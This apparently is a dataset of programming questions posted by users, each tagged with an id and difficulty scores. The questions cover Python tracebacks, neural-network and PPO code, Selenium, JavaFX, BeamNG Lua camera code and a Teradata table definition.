deck.write_to_db(cursor, timestamp, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\deck.py", line 67, in write_to_db
note.write_to_db(cursor, timestamp, self.deck_id, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 154, in write_to_db
self._check_invalid_html_tags_in_fields()
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 140, in _check_invalid_html_tags_in_fields
invalid_tags = self._find_invalid_html_tags_in_field(field)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 136, in _find_invalid_html_tags_in_field
return cls._INVALID_HTML_TAG_RE.findall(field)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'float'
(base) PS F:\testpython> python .\test01.py
Traceback (most recent call last):
File "F:\testpython\test01.py", line 52, in <module>
package.write_to_file('pure-text-facts.apkg')
File "D:\anaconda\Lib\site-packages\genanki\package.py", line 40, in write_to_file
self.write_to_db(cursor, timestamp, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\package.py", line 60, in write_to_db
deck.write_to_db(cursor, timestamp, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\deck.py", line 67, in write_to_db
note.write_to_db(cursor, timestamp, self.deck_id, id_gen)
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 154, in write_to_db
self._check_invalid_html_tags_in_fields()
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 140, in _check_invalid_html_tags_in_fields
invalid_tags = self._find_invalid_html_tags_in_field(field)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "D:\anaconda\Lib\site-packages\genanki\note.py", line 136, in _find_invalid_html_tags_in_field
return cls._INVALID_HTML_TAG_RE.findall(field)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: expected string or bytes-like object, got 'float'
(base) PS F:\testpython>
|
c116c6c22b787541b6c906eec26863b8
|
{
"intermediate": 0.36935508251190186,
"beginner": 0.34238991141319275,
"expert": 0.2882550358772278
}
|
45,749
|
Import
Adult
Census
prediction
dataset
from
Azure
dataset
and
build
a
Neural
Networkmodel,
evaluate
and visualize results of all python vailable plots.
import dataset from URL or azure anything, i dont have dataset locally
give me full program
also add this feature to the code:
take value inputted by user and give me output in text format from labelled dataset
build a neural network model to take any input data and process data
by taking dataset as reference or labelled dataset
|
c08f7533775e4f40187cd7aae5b129db
|
{
"intermediate": 0.3706452250480652,
"beginner": 0.14217355847358704,
"expert": 0.4871812164783478
}
|
45,750
|
Check whether we are accumulating reward of all steps and check whether the policy were designed appropriately for get trained as a good policy for maximizing the accumulated reward.
class PPOAgent:
def __init__(self, actor_class, critic_class, gnn_model, action_dim, bounds_low, bounds_high,
lr_actor=3e-4, lr_critic=1e-3, gamma=0.99, lamda=0.95, epsilon=0.2, std=0.0):
self.actor = actor_class(gnn_model.conv2.out_channels, action_dim, std) # Initialize actor
self.critic = critic_class(gnn_model.conv2.out_channels) # Initialize critic
self.gnn_model = gnn_model # GNN model instance
self.optimizer_actor = optim.Adam(self.actor.parameters(), lr=lr_actor)
self.optimizer_critic = optim.Adam(self.critic.parameters(), lr=lr_critic)
self.gamma = gamma
self.lamda = lamda
self.epsilon = epsilon
#self.bounds_low = torch.tensor(bounds_low).float()
#self.bounds_high = torch.tensor(bounds_high).float()
self.bounds_low = bounds_low
self.bounds_high = bounds_high
self.std = std
self.epochs = 10 # Define the number of epochs for policy update
def select_action(self, state, edge_index, edge_attr):
# Pass state through the GNN model first to get state’s embedding
state_embedding = self.gnn_model(state, edge_index, edge_attr)
# Then, pass the state embedding through the actor network to get action mean and std
mean, std = self.actor(state_embedding)
# Rearranging based on the specifications
rearranged_mean = rearrange_action_output(mean)
# Scale mean based on action bounds defined
mean = self.bounds_low + (torch.sigmoid(rearranged_mean) * (self.bounds_high - self.bounds_low))
dist = Normal(mean, std)
# Sample an action from the distribution and calculate its log probability
action = dist.sample()
action = torch.clamp(action, self.bounds_low, self.bounds_high) # Ensure action is within bounds
action_log_prob = dist.log_prob(action)
return action.detach(), action_log_prob.detach()
def compute_gae(self, next_value, rewards, dones, values, gamma=0.99, lambda_=0.95):
values.append(next_value)
gae = 0
returns = []
for step in reversed(range(len(rewards))):
#delta = rewards[step] + gamma * values[step + 1] * dones[step] - values[step]
delta = rewards[step] + gamma * values[step + 1] * (1 - dones[step]) - values[step]
#gae = delta + gamma * lambda_ * dones[step] * gae
gae = delta + gamma * lambda_ * (1 - dones[step]) * gae
returns.insert(0, gae + values[step])
return returns
def update_policy(self, states, actions, log_probs, returns, advantages):
for epoch in range(self.epochs):
sampler = BatchSampler(SubsetRandomSampler(range(len(states))), batch_size=64, drop_last=True)
for indices in sampler:
sampled_states = torch.stack([states[i] for i in indices])
sampled_actions = torch.stack([actions[i] for i in indices])
sampled_log_probs = torch.stack([log_probs[i] for i in indices])
sampled_returns = torch.stack([returns[i] for i in indices])
sampled_advantages = torch.stack([advantages[i] for i in indices])
# Assuming the actor model returns a distribution from which log probabilities can be computed
mean, new_std = self.actor(sampled_states)
dist = Normal(mean, new_std.exp())
new_log_probs = dist.log_prob(sampled_actions)
ratio = (new_log_probs - sampled_log_probs).exp()
# Incorporating stability loss
stability_losses = []
for state in sampled_states:
stability_loss_val = stability_loss(state, target_stability=1.0) # Assuming you want all nodes to be stable
stability_losses.append(stability_loss_val)
mean_stability_loss = torch.mean(torch.stack(stability_losses))
surr1 = ratio * sampled_advantages
surr2 = torch.clamp(ratio, 1.0 - self.epsilon, 1.0 + self.epsilon) * sampled_advantages
actor_loss = -torch.min(surr1, surr2).mean() + mean_stability_loss
critic_loss = F.mse_loss(sampled_returns, self.critic(sampled_states))
self.optimizer_actor.zero_grad()
actor_loss.backward()
self.optimizer_actor.step()
self.optimizer_critic.zero_grad()
critic_loss.backward()
self.optimizer_critic.step()
# Training loop
def train(env, agent, num_episodes, max_timesteps, batch_size, epsilon):
for episode in range(num_episodes):
node_features_tensor, edge_feature_tensor, edge_index, performance_metrics = env.reset()
episode_rewards = []
states = []
actions = []
log_probs = []
values = []
dones = []
state = torch.tensor(node_features_tensor, dtype=torch.float32) # Assuming the node_features_tensor is a tensor
for t in range(max_timesteps):
action, log_prob = agent.select_action((state, edge_feature_tensor, edge_index))
#next_state, next_edge_feature_tensor, next_edge_index, reward, done, previous_metrics = env.step(action)
next_state, next_edge_feature_tensor, next_edge_index, reward, done, previous_metrics = env.step(action.numpy())
print("next_state1", next_state)
next_state = torch.tensor(next_state, dtype=torch.float32) # Convert to tensor if not already
print("next_state2", next_state)
episode_rewards.append(reward)
states.append(state)
actions.append(action)
log_probs.append(log_prob)
values.append(agent.critic(state).item()) # Assuming this is how you get value estimation
dones.append(1 - float(done))
state = next_state
edge_feature_tensor = next_edge_feature_tensor
edge_index = next_edge_index
if done:
next_value = agent.critic(next_state).item() # Fetch next state value for GAE
break
# Outside the loop, we need to handle the case when we haven’t reached done
if not done:
next_value = agent.critic(next_state).item()
# Compute returns and advantages
returns = agent.compute_gae(next_value, episode_rewards, dones, values, agent.gamma, agent.lamda)
# Normalizing advantages
advantages = torch.tensor(returns) - torch.tensor(values)
# Update policy and value network
agent.update_policy(states, actions, log_probs, returns, advantages)
# Log episode information
total_reward = sum(episode_rewards)
print(f"Episode {episode + 1}/{num_episodes}, Total Reward: {total_reward}")
# Create the environment
env = CircuitEnvironment(server_address, username, password, bounds_low, bounds_high, target_metrics, netlist_content)
gnn_model = EnhancedGNNModelWithSharedParams(num_node_features, num_edge_features, num_out_features)
actor_output_features = gnn_model.conv2.out_channels
print(f"Initializing Actor with output feature size: {actor_output_features}")
agent = PPOAgent(actor, critic, gnn_model, action_dim, bounds_low, bounds_high, lr_actor, lr_critic, gamma, lambda_, epsilon, std)
# Train agent
train(env, agent, env.num_episodes, env.max_timesteps, env.batch_size, env.epsilon)
|
de67e690e477aa02bc8ee6039f79ef7c
|
{
"intermediate": 0.310166597366333,
"beginner": 0.45706167817115784,
"expert": 0.23277175426483154
}
|
45,751
|
response.text().then(text => {
alert(text); // 使用alert显示响应的文本
const data = JSON.parse(text);
//const data = text
const selectedValue = data.itemList[0]; // 假设这里取第一个结果
document.getElementById('resultInput').value = selectedValue.fullname;
document.getElementById('itemid').value = selectedValue.id;
//getskuid(selectedValue.id)
}); 检查错误
|
2d68ebb43e79bd07ad775bddc25977f9
|
{
"intermediate": 0.36225593090057373,
"beginner": 0.3642467260360718,
"expert": 0.2734973728656769
}
|
45,752
|
{
"itemList": [{
"basetype": "ptype",
"ktypeid": 0,
"btypeid": 0,
"id": "1635979231439280482",
"typeid": "0069700594",
"usercode": "",
"fullname": "湖北联通-rizhao6244(20万)5G套餐",
"name": "",
"namepy": "hbltrizhao624420w5gtc",
"standard": "",
"type": "",
"area": "",
"recpricebase": 1.0000,
"supplyinfo": "",
"preprice": 0.0000,
"preprice2": 0.0000,
"preprice3": 0.0000,
"preprice5": 0.0000,
"preprice6": 0.0000,
"preprice_6": 0.0000,
"preprice_7": 0.0000,
"preprice_8": 0.0000,
"preprice_9": 0.0000,
"preprice_10": 0.0000,
"ptypeunit": "",
"recprice": 1.0000,
"sonnum": 0,
"leveal": 2,
"barcode": "",
"prop1_enabled": false,
"prop2_enabled": false,
"prop3_enabled": false,
"taobao_cid": 0,
"comment": "19楼水池边拐角",
"pcategory": 0,
"taxrate": 0.0000,
"lastbuyprice": 0.0000,
"lastsaleprice": 0.0000,
"lastbuydiscount": 1.0000,
"lastsalediscount": 1.0000,
"ucode": 1,
"urate": 1.0000,
"qty": 167747.0000,
"costprice": 1.0000,
"qtyshow": 167747.0000,
"saleqty": 167747.0000,
"unit1": "",
"position": null,
"parid": "527521683758899242",
"partypeid": "00697",
"snenabled": 2,
"protectdays": 0,
"weight": 0.0000,
"retailprice": 0.0000,
"isclass": false,
"pic_url": "",
"modifiedtime": new Date(1703137403000),
"kfullname": null,
"brandname": null,
"costmode": 0,
"hastrack": 0,
"ptypevolume": 0.0000,
"ptypelength": 0.0000,
"ptypewidth": 0.0000,
"ptypeheight": 0.0000,
"isweight": false,
"batchid": 0,
"btypeptypecode": null,
"subqtyshow": 0.00000000,
"total": 167747.0000,
"lockqty": 0,
"surpqty": 167747.0000
}],
"itemCount": 1
} 这个json串中去掉modifiedtime
|
0dbf865fd8ad42c314a32552bc861bc2
|
{
"intermediate": 0.31902262568473816,
"beginner": 0.45041796565055847,
"expert": 0.23055940866470337
}
|
45,753
|
Write me a CSS class for this: swiper-pagination-bullet but NOT swiper-pagination-bullet-active
|
99e313da35439f3aa6aae2581a041163
|
{
"intermediate": 0.18898341059684753,
"beginner": 0.6786189079284668,
"expert": 0.13239769637584686
}
|
45,754
|
Can I create a cookie in client script? servicenow If possible, please let me know the code.
|
b9a05ef3a922c5238503eb3cec780cdc
|
{
"intermediate": 0.48549169301986694,
"beginner": 0.22398215532302856,
"expert": 0.2905261814594269
}
|
45,755
|
Java fx make application contains login screen, signup screen, main screen using mvvm
|
17fcad2b6f9d8d7e14bec24d121ccf66
|
{
"intermediate": 0.46013712882995605,
"beginner": 0.19835886359214783,
"expert": 0.3415040075778961
}
|
45,756
|
please be a senior sapui5 developer and answer my following questions with working code examples.
|
e66b22f9f008e658df0e22ae9aa3b9f0
|
{
"intermediate": 0.41582927107810974,
"beginner": 0.27387818694114685,
"expert": 0.31029248237609863
}
|
45,757
|
как исправить код
def columnTitleNotSku(self, block):
blockNotSku = block.find_elements(By.CSS_SELECTOR, "table[aria-label='Товары, не подпадающие под условия']")
titleColumns = []
columns = blockNotSku.find_elements(By.CSS_SELECTOR, '.table__row ')
for column in columns:
titleBrand = column.find_element(By.CSS_SELECTOR, '.table__cell_head.table__cell_text-leftside').get_attribute('innerText')
test.log(str(titleBrand))
titleColumn = column.find_element(By.CSS_SELECTOR, '.table__cell_head.table__cell_text-rightside').get_attribute('innerText')
test.log(str(titleColumn))
titleColumns.append({'titleBrand': titleBrand, 'titleColumn': titleColumn})
return titleColumns
Сейчас код находит 6 строк класса table__row
Но только в 2 содержаться локаторы By.CSS_SELECTOR, '.table__cell_head.table__cell_text-leftside' и By.CSS_SELECTOR, '.table__cell_head.table__cell_text-rightside'
Поэтому я получаю значения По каждой позиции и фейсинг
После этого идет элемент table__row не содержащий данных локаторов
Поэтому я получаю ошибку Detail selenium.common.exceptions.NoSuchElementException: Message: no such element: Unable to locate element: {"method":"css selector","selector":".table__cell_head.table__cell_text-leftside"}
(Session info: chrome=83.0.4103.106) /home/mishq/.local/lib/python3.8/site-packages/selenium/webdriver/remote/errorhandler.py:242
Страница на которой происходит поиск
<main class="app"><div data-v-14a38258="" class="item"><div data-v-3d02ac8c="" data-v-14a38258="" class="wrapper item__header"><div data-v-3d02ac8c="" class="header"><div data-v-3d02ac8c="" class="header__title">
[V1]
</div> <div data-v-2da3ef00="" data-v-3d02ac8c="" class="tag">
Целевая
</div> <div data-v-3d02ac8c="" class="header__toggle header__toggle_open"><img data-v-3d02ac8c="" src="qrc:///themes/material/icons/item_grouparrow.svg" alt=""></div></div> <!----></div> <div data-v-216cddc6="" data-v-14a38258="" class="item__body"><table data-v-7195ce4f="" data-v-216cddc6="" aria-label="Атрибуты механик" class="table"><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Документ №
</th> <td data-v-7195ce4f="" class="table__cell">
МС-00021
</td></tr><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Дата
</th> <td data-v-7195ce4f="" class="table__cell">
31.03.2024
</td></tr><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Механика
</th> <td data-v-7195ce4f="" class="table__cell">
[V1]
</td></tr><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Формат ТТ
</th> <td data-v-7195ce4f="" class="table__cell">
М100-ТОП
</td></tr><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Регион
</th> <td data-v-7195ce4f="" class="table__cell">
Москва г.
</td></tr><tr data-v-7195ce4f="" class="table__row"><th data-v-7195ce4f="" scope="row" class="table__cell table__cell_description">
Допустимо ошибок
</th> <td data-v-7195ce4f="" class="table__cell">
7
</td></tr></table> <div data-v-4f2d4c08="" data-v-216cddc6=""><div data-v-4f2d4c08="" class="condition__title">
Цели для исполнения плана
</div> <div data-v-e9a354a6="" data-v-4f2d4c08="" class="condition"><div data-v-e9a354a6="" class="condition__info">
Бренд
</div> <table data-v-e9a354a6="" aria-label="Товары, не подпадающие под условия" class="table"><tr data-v-e9a354a6="" class="table__row"><th data-v-e9a354a6="" scope="col" class="table__cell table__cell_head table__cell_text-leftside">
По каждой позиции
</th> <th data-v-e9a354a6="" scope="col" class="table__cell table__cell_head table__cell_text-rightside">
фейсинг
</th></tr> <tr data-v-e9a354a6="" class="table__row"><td data-v-e9a354a6="" class="table__cell">
Ардели
</td> <td data-v-e9a354a6="" class="table__cell table__cell_text-rightside">
2
</td></tr><tr data-v-e9a354a6="" class="table__row"><td data-v-e9a354a6="" class="table__cell">
Золотой Резерв
</td> <td data-v-e9a354a6="" class="table__cell table__cell_text-rightside">
6
</td></tr></table> <div data-v-e9a354a6="" class="condition__nested"><div data-v-e9a354a6="" class="condition__relation">
и еще
</div> <div data-v-e9a354a6=""><!----> <table data-v-e9a354a6="" aria-label="Товары, не подпадающие под условия" class="table"><tr data-v-e9a354a6="" class="table__row"><th data-v-e9a354a6="" scope="col" class="table__cell table__cell_head table__cell_text-leftside">
Любая комбинация из позиций
</th> <th data-v-e9a354a6="" scope="col" class="table__cell table__cell_head table__cell_text-rightside">
общ. фейсинг
</th></tr> <tr data-v-e9a354a6="" class="table__row"><td data-v-e9a354a6="" class="table__cell">
Старая Москва
</td> <td data-v-e9a354a6="" rowspan="2" class="table__cell table__cell_union">
3
</td></tr><tr data-v-e9a354a6="" class="table__row"><td data-v-e9a354a6="" class="table__cell">
Зимняя Дорога
</td> <!----></tr></table> </div></div></div></div></div></div><div data-v-14a38258="" class="item"><div data-v-3d02ac8c="" data-v-14a38258="" class="wrapper item__header"><div data-v-3d02ac8c="" class="header"><div data-v-3d02ac8c="" class="header__title">
|
c0a60f992be1d58997252db238542c1e
|
{
"intermediate": 0.34262484312057495,
"beginner": 0.5018753409385681,
"expert": 0.15549975633621216
}
|
45,758
|
Import
Adult
Census
prediction
dataset
from
Azure
dataset
and
build
a
Neural
Networkmodel,
evaluate
and visualize results of all python vailable plots.
import dataset from URL or azure anything, i dont have dataset locally
url = "https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data"
give me full program
also add this feature to the code:
take value inputted by user and give me output in text format from labelled dataset
build a neural network model to take any input data and process data
by taking dataset as reference or labelled dataset
plots:
# Generate predictions and evaluate the model
# Confusion Matrix
conf_matrix = confusion_matrix()
plt.figure(figsize=(6, 6))
sns.heatmap(conf_matrix, annot=True, fmt='d', cmap='Blues', cbar=False)
plt.title("Confusion Matrix")
plt.ylabel('Actual label')
plt.xlabel('Predicted label')
plt.show()
# ROC Curve & AUC
fpr, tpr, _ = roc_curve
roc_auc = auc(fpr, tpr)
plt.plot(fpr, tpr, color='darkorange', lw=2, label=f'ROC curve (area = {roc_auc:.2f})')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver Operating Characteristic')
plt.legend(loc="lower right")
plt.show()
# Training & Validation Loss and Accuracy Over Epochs
label='Training Loss')
label='Validation Loss')
set_title('Loss Over Epochs')
set_xlabel('Epoch')
set_ylabel('Loss')
legend()
label='Training Accuracy')
label='Validation Accuracy')
set_title('Accuracy Over Epochs')
set_xlabel('Epoch')
set_ylabel('Accuracy')
legend()
plt.tight_layout()
plt.show()
|
0a81bbe6c65cf471c98995248a69b206
|
{
"intermediate": 0.440537691116333,
"beginner": 0.12894634902477264,
"expert": 0.43051594495773315
}
|
45,759
|
как работает этот код -- This Source Code Form is subject to the terms of the bCDDL, v. 1.1.
-- If a copy of the bCDDL was not distributed with this
-- file, You can obtain one at http://beamng.com/bCDDL-1.1.txt
local collision = require('core/cameraModes/collision')
local function rotateVectorAroundZAxis(vector, angleDeg)
local angle = math.rad(angleDeg)
local rotationMatrix = {
{math.cos(angle), -math.sin(angle), 0},
{math.sin(angle), math.cos(angle), 0},
{0, 0, 1}
}
local rotatedVector = vec3(
vector.x * rotationMatrix[1][1] + vector.y * rotationMatrix[1][2] + vector.z * rotationMatrix[1][3],
vector.x * rotationMatrix[2][1] + vector.y * rotationMatrix[2][2] + vector.z * rotationMatrix[2][3],
vector.x * rotationMatrix[3][1] + vector.y * rotationMatrix[3][2] + vector.z * rotationMatrix[3][3]
)
return rotatedVector
end
local C = {}
C.__index = C
function C:init()
self.disabledByDefault = false
self.camResetted = 2
self.lastVel = nil
self.lastCamPos = vec3()
self.lastDir = vec3()
self.dirSmoothX = newTemporalSpring(20, 8)
self.dirSmoothY = newTemporalSpring(60, 10)
self.dirSmoothZ = newTemporalSmoothingNonLinear(8, 8)
self.smoothHeight = newTemporalSpring(50, 5)
self.smoothVel = newTemporalSpring(10, 5)
self.smoothYawX = newTemporalSmoothing(5, 5, 2, 0)
self.smoothYawY = newTemporalSmoothing(5, 5, 2, 0)
self.upSmoothingX = newTemporalSmoothingNonLinear(0.9, 0.9, 0)
self.upSmoothingZ = newTemporalSmoothingNonLinear(0.6, 0.6, 0)
self.c_time = 0
self.collision = collision()
self.collision:init()
self:onSettingsChanged()
end
function C:onSettingsChanged()
self.fov_max = settings.getValue('eccMaxFov', 76)
self.fxGforceStrength = vec3(
settings.getValue('eccFxGforceX', 1),
settings.getValue('eccFxGforceY', 1),
settings.getValue('eccFxGforceZ', 1))
self.camDistance = settings.getValue('eccCamDist', 0)
self.camPitch = settings.getValue('eccCamHeight', 0.4)
self.camAngle = math.tan(math.rad(settings.getValue('eccCamAngle', 15)))
self.fxShakeStrength = settings.getValue('eccFxShake', 1)
self.fxVelStrength = settings.getValue('eccFxVelX', 1)
self.fxVelYStrength = settings.getValue('eccFxVelY', 1)
self.fxVelZStrength = settings.getValue('eccFxVelZ', 1)
self.fxRollStrength = settings.getValue('eccFxRoll', 1)
self.fxZbounce = settings.getValue('eccFxZbounce', true)
self.fov = self.fov_max * 0.68
end
function C:onVehicleCameraConfigChanged()
self.camResetted = self.camResetted + 2
end
function C:reset()
self.camResetted = self.camResetted + 1
self.lastVel = nil
end
local front = vec3(0, 1, 0)
local s = 1.2
local rear, top = 0, 0
local camerarot
local bboxoffset, bboxoffset2, center = vec3(), vec3(), vec3()
local camOffset, targetOffset = vec3(), vec3()
local g_forces, shake_vec = vec3(), vec3()
function C:update(data)
data.res.collisionCompatible = true
self.c_time = self.c_time + data.dt
-- camera offset control
camerarot = ((math.atan2(
self.smoothYawX:get(MoveManager.yawLeft - MoveManager.yawRight, data.dt),
self.smoothYawY:get(MoveManager.pitchUp - MoveManager.pitchDown, data.dt))/math.pi) * 180) % 360
--camerarot = self.smoothYaw:get(camerarot, data.dt)
local cameradist = (MoveManager.zoomIn - MoveManager.zoomOut)
self.camDistance = clamp(self.camDistance + cameradist * 0.1, -0.4, 5)
-- vehicle offsets
local ref = data.veh:getNodePosition(self.refNodes.ref)
local left = data.veh:getNodePosition(self.refNodes.left)
local back = data.veh:getNodePosition(self.refNodes.back)
center:setLerp(back, left, 0.5)
local dir = (ref - back); dir = dir:normalized()
local dir_l = (left - ref); dir_l:normalized()
local dir_up = dir:cross(dir_l)
local quat_dir_z = quatFromDir(dir, dir_up)
local quat_dir = quatFromDir(dir)
local rev_dir = quat_dir:conjugated()
-- reset stuff
if self.camResetted > 1 then
rear = -data.veh:getSpawnWorldOOBBRearPoint():distance(data.veh:getBBCenter())
top = -rear * 0.34
bboxoffset = (data.veh:getBBCenter() - (data.pos + center)):rotated(rev_dir)
bboxoffset.x = 0
end
bboxoffset2 = bboxoffset:rotated(quat_dir_z)
if self.camResetted > 0 then
log("D", "ECC", self.camResetted)
self.lastVel = dir
self.smoothHeight:set(data.pos.z)
self.upSmoothingX:set(0)
self.upSmoothingZ:set(0)
self.dirSmoothX:set(0)
self.dirSmoothY:set(0)
self.dirSmoothZ:set(0)
self.lastCamPos:set(data.pos)
self.camResetted = 0
end
local dvel = data.vel - data.prevVel
local accel = (dvel / data.dt)
local l_accel = accel:rotated(rev_dir)
local l_vel = data.vel:rotated(rev_dir)
local vel_dir = data.vel:normalized()
vel_dir:setLerp(self.lastVel, vel_dir, 0.06)
if data.vel:length() > 1 then
self.lastVel = vel_dir
else
vel_dir = self.lastVel
end
local dir_diff = vec3(); dir_diff:setLerp(dir, vel_dir, 0.69)
--local dir_diff = vec3(); dir_diff:setLerp(dir, vel_dir, 0.69 - math.abs(l_accel.x) * 0.01 + math.abs(l_vel.x) * 0.01)
dir_diff:normalized(); dir_diff = dir_diff:z0()
if data.lookBack == true then
camerarot = 180
end
dir_diff = rotateVectorAroundZAxis(dir_diff, camerarot)
local vel_dir_quat = quatFromDir(dir_diff)
local vel_s = clamp(math.exp((-100 / data.vel:length())+2), 0, 1)
local shake_x = vel_s * math.sin(2 * math.pi * 16 * (self.c_time + data.dt * math.random()))
local shake_z = vel_s * math.sin(2 * math.pi * 11 * (self.c_time + data.dt * math.random()))
local fps_s_amt = clamp(((1/data.dt) * 0.017), 0, 1)
shake_vec:set(
fps_s_amt * shake_x * 0.006,
0,
fps_s_amt * shake_z * 0.012)
shake_vec:setScaled(self.fxShakeStrength)
local zoom = linearScale(math.abs(data.vel:length()), 0, 40, -rear, (-rear * self.fov) / self.fov_max)
local vel_y_component = clamp((1/(1 + 9 * math.exp(-math.abs(data.vel:length() * 0.2))) - 0.1) * s, 0, 1)
g_forces:set(
self.dirSmoothX:get(l_accel.x * 0.04, data.dt),
clamp(self.dirSmoothY:get(-l_accel.y * 0.06, data.dt), -math.huge, -rear),
self.dirSmoothZ:get(-accel.z * 0.004, data.dt))
g_forces:setComponentMul(self.fxGforceStrength)
local x_offset = self.smoothVel:get(rescale(l_vel.x * vel_y_component, -10, 10, 0.5, -0.5), data.dt)
local y_offset = - vel_y_component * 0.2
local z_offset = top * 0.4 - (linearScale(vel_y_component, 0, 1, 0, top * 0.4))
camOffset:set(
x_offset * self.fxVelStrength,
y_offset * self.fxVelYStrength - zoom - self.camDistance + rear * 1.2,
z_offset + top * 0.66 + self.camPitch - (rear - self.camDistance) * self.camAngle)
camOffset:setAdd(g_forces)
camOffset:setAdd(shake_vec)
targetOffset:set(
x_offset * 0.6 * self.fxVelStrength + g_forces.x,
-y_offset * self.fxVelYStrength - rear,
top * 0.66 + self.camPitch + rear * self.camAngle)
camOffset.z = camOffset.z - 0.3 * self.fxVelZStrength * math.abs(x_offset)
targetOffset.z = targetOffset.z - 0.4 * self.fxVelZStrength * math.abs(x_offset)
camOffset:setRotate(vel_dir_quat)
targetOffset:setRotate(vel_dir_quat)
local up_dir = dir_up:rotated(rev_dir)
up_dir.x = self.upSmoothingX:get((clamp(up_dir.x, -0.1, 0.1) + clamp(x_offset * 0.2 * self.fxRollStrength, -0.1, 0.1)), data.dt) + fps_s_amt * ((shake_x * shake_z * 0.003) * self.fxShakeStrength)
up_dir.y = 0
up_dir.z = 1
up_dir:normalize()
up_dir:setRotate(vel_dir_quat)
local pitch = vec3(0, 0, 0)
pitch.z = self.upSmoothingZ:get(clamp(dir.z, -0.3, 0.3), data.dt)
local base_pos = vec3(); base_pos:set(data.pos)
if self.fxZbounce == true then
local z_diff = self.lastCamPos.z - data.pos.z
if z_diff > 0 then
base_pos.z = self.lastCamPos.z + 0.66 * (data.pos.z - self.lastCamPos.z)
end
base_pos.z = self.smoothHeight:get(base_pos.z, data.dt)
end
self.lastCamPos:set(base_pos)
local newpos = base_pos + center + bboxoffset2 + camOffset - pitch
local targetPos = base_pos + center + bboxoffset2 + targetOffset + pitch
-- application
data.res.fov = self.fov * (-rear / zoom)
data.res.pos:set(newpos.x, newpos.y, newpos.z)
data.res.rot = quatFromDir(targetPos - data.res.pos, up_dir)
self.collision:update(data)
--DEBUG STUFF:
--log("D", "ECC", "Acceleration: " .. tostring(l_accel) .. " Velocity: " .. tostring(l_vel))
--debugDrawer:drawSphere((targetPos):toPoint3F(), 0.2, ColorF(0,0,1,1))
--debugDrawer:drawLine((data.pos + center + bboxoffset2):toPoint3F(), (data.pos + center + bboxoffset2 + vec3(0, 0 , z_offset)):toPoint3F(), ColorF(0,1,0,1))
--debugDrawer:drawLine((data.pos + center + bboxoffset2):toPoint3F(), (data.pos + center + bboxoffset2 + data.vel):toPoint3F(), ColorF(0,1,0,1))
--debugDrawer:drawLine((data.pos + center + bboxoffset2):toPoint3F(), (data.pos + center + bboxoffset2 + dir_up):toPoint3F(), ColorF(0,1,0,1))
--debugDrawer:drawLine((data.pos + center + bboxoffset2):toPoint3F(), (data.pos + center + bboxoffset2):toPoint3F(), ColorF(0,1,0,1))
--debugDrawer:drawLine((data.pos + center + bboxoffset2):toPoint3F(), (data.pos + center + bboxoffset2 + vec3(0, 0, top)):toPoint3F(), ColorF(0,1,0,1))
--debugDrawer:drawLine((data.pos + center):toPoint3F(), (data.pos + center + data.vel):toPoint3F(), ColorF(0,1,1,1))
--debugDrawer:drawLine((data.pos + center + data.vel):toPoint3F(), (data.pos + center + data.vel + accel):toPoint3F(), ColorF(1,1,0,1))
--debugDrawer:setLastZTest(false)
return true
end
function C:setRefNodes(centerNodeID, leftNodeID, backNodeID)
self.refNodes = self.refNodes or {}
self.refNodes.ref = centerNodeID
self.refNodes.left = leftNodeID
self.refNodes.back = backNodeID
end
-- DO NOT CHANGE CLASS IMPLEMENTATION BELOW
return function(...)
local o = ... or {}
setmetatable(o, C)
o:init()
return o
end
|
87fa230e18d47265168a4bee03c0dd10
|
{
"intermediate": 0.3108116686344147,
"beginner": 0.4632760286331177,
"expert": 0.22591228783130646
}
|
45,760
|
generate long running query for Teradata table : CREATE MULTISET TABLE CDMTDFMGR.CUPN_larger ,FALLBACK ,
NO BEFORE JOURNAL,
NO AFTER JOURNAL,
CHECKSUM = DEFAULT,
DEFAULT MERGEBLOCKRATIO,
MAP = TD_MAP1
(
CUPN_NO BIGINT NOT NULL,
TCKT_NO VARCHAR(30) CHARACTER SET LATIN CASESPECIFIC NOT NULL,
CNSM_AT_ISSU_IND CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
CUPN_TYPE_CD CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
MEDA_TYPE_CD CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
CUPN_STS_CD CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
RFISC_CD CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
RFIC_CD CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_DT DATE FORMAT 'YYYY-MM-DD',
SERV_DELV_PROV_LOCN_CD CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
SERV_DELV_PROV_NM VARCHAR(100) CHARACTER SET LATIN CASESPECIFIC,
VALU_AMT BIGINT,
VALU_CRNC CHAR(3) CHARACTER SET LATIN CASESPECIFIC,
OPEN_DT DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CLOSE_DT DATE FORMAT 'YYYY-MM-DD' NOT NULL,
CNSM_AT_ISSU_IND_1 CHAR(1) CHARACTER SET LATIN CASESPECIFIC,
CUPN_TYPE_CD_1 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
MEDA_TYPE_CD_1 CHAR(8) CHARACTER SET LATIN CASESPECIFIC,
